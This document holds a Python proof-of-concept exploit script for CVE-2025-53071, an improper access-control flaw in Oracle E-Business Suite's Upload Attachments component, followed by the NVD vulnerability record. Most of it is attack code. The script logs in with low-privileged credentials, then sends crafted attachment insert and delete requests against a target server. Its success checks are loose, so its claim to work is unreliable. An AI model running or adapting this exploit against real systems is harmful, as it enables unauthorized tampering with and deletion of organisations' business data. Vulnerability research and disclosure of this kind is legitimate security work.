CVE-2025-53071

#!/usr/bin/env python3 # CVE-2025-53071 - Oracle E-Business Suite Upload Attachments Unauthorized Data Modification PoC # This PoC demonstrates the exploitation of improper access control in the # Oracle Applications Framework Upload Attachments component. import requests import sys import argparse from urllib.parse import urljoin class OracleEBSExploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', }) def authenticate(self): """Authenticate to Oracle E-Business Suite with low-privileged credentials.""" login_url = urljoin(self.target_url, '/OA_HTML/AppsLogin') data = { 'username': self.username, 'password': self.password, 'langCode': 'US', } resp = self.session.post(login_url, data=data, allow_redirects=True) if resp.status_code == 200 and 'AppsLocalLogin' in resp.url: print("[+] Authentication successful") return True print("[-] Authentication failed") return False def exploit_upload_attachment(self, attachment_data, target_entity_id): """ Exploit the Upload Attachments component to perform unauthorized data modification (insert/update) on Oracle Applications Framework. """ upload_url = urljoin( self.target_url, '/OA_HTML/OA.jsp?page=/oracle/apps/fnd/attachment/webui/AttachmentPG' ) # Craft multipart form data for attachment upload files = { 'uploadFile': ('attachment.txt', attachment_data, 'text/plain') } data = { 'entityId': target_entity_id, 'entityName': 'FND_ATTACHED_DOCUMENTS', 'category': 'MISC', 'datatypeId': '1', 'operation': 'INSERT', '_AM_TXnId': '0', } resp = self.session.post(upload_url, files=files, data=data) if resp.status_code == 200: print("[+] Attachment upload request sent successfully") if 'error' not in resp.text.lower(): print("[+] Possible unauthorized data modification achieved") return True print("[-] Exploit attempt failed") return False def exploit_unauthorized_delete(self, attachment_id): """ Attempt unauthorized deletion of attachment data. """ delete_url = urljoin( self.target_url, f'/OA_HTML/OA.jsp?page=/oracle/apps/fnd/attachment/webui/AttachmentPG&attachmentId={attachment_id}&operation=DELETE' ) resp = self.session.get(delete_url) if resp.status_code == 200: print(f"[+] Unauthorized delete request sent for attachment {attachment_id}") return True return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-53071 PoC Exploit') parser.add_argument('-u', '--url', required=True, help='Target Oracle EBS URL') parser.add_argument('-l', '--username', required=True, help='Low-privileged username') parser.add_argument('-p', '--password', required=True, help='Password') parser.add_argument('-e', '--entity', default='1', help='Target entity ID') parser.add_argument('-a', '--attachment-id', default='1', help='Attachment ID to delete') args = parser.parse_args() exploit = OracleEBSExploit(args.url, args.username, args.password) if exploit.authenticate(): exploit.exploit_upload_attachment(b'Malicious attachment data', args.entity) exploit.exploit_unauthorized_delete(args.attachment_id) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-53071", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:48.430", "lastModified": "2025-10-24T14:37:40.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Upload Attachments). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:applications_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "E221C0C5-FC44-4D76-A6E6-F451A6466A17"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}